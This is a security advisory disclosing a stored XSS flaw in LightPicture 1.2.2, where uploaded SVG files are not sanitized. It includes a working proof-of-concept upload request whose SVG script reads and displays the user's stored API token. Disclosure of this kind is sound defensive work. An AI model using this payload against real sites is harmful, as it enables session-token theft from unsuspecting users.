osuuu LightPicture 1.2.2 Stored XSS Vulnerability

[Hebing123]

Summary

osuuu LightPicture 1.2.2 version is vulnerable to a stored Cross-Site Scripting (XSS) attack. The vulnerability exists in the system's settings where users with the ability to upload images are allowed to upload SVG files by default.

Details

The vulnerability arises because the system does not sufficiently sanitize the uploaded SVG files. SVG files can contain embedded JavaScript code, which, if not properly validated and sanitized, can be executed in the context of the user's browser when the image is viewed. This can allow an attacker to execute arbitrary JavaScript code within the browser of a user who views the maliciously crafted SVG image.

/public/install/lp.sql:

POC

To exploit this vulnerability, an attacker can upload a specially crafted SVG file containing JavaScript code. The following is an example of a POST request that can be used to upload an SVG file containing a stored XSS payload:

POST /api/upload HTTP/1.1
Host: target-ip
Content-Length: 711
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.95 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryD6b0As0Nk8kPDjXW
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: [users'cookie]
Connection: keep-alive

------WebKitFormBoundaryD6b0As0Nk8kPDjXW
Content-Disposition: form-data; name="key"

[users' api key]
------WebKitFormBoundaryD6b0As0Nk8kPDjXW
Content-Disposition: form-data; name="file"; filename="test.svg"
Content-Type: image/svg+xml

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200">
<script>alert("iptoken:"+window.localStorage.lp_token)</script>
</svg>
------WebKitFormBoundaryD6b0As0Nk8kPDjXW--

After uploading we get a url: /LightPicture/2024/12/b676a4d5f8b6caf2.svg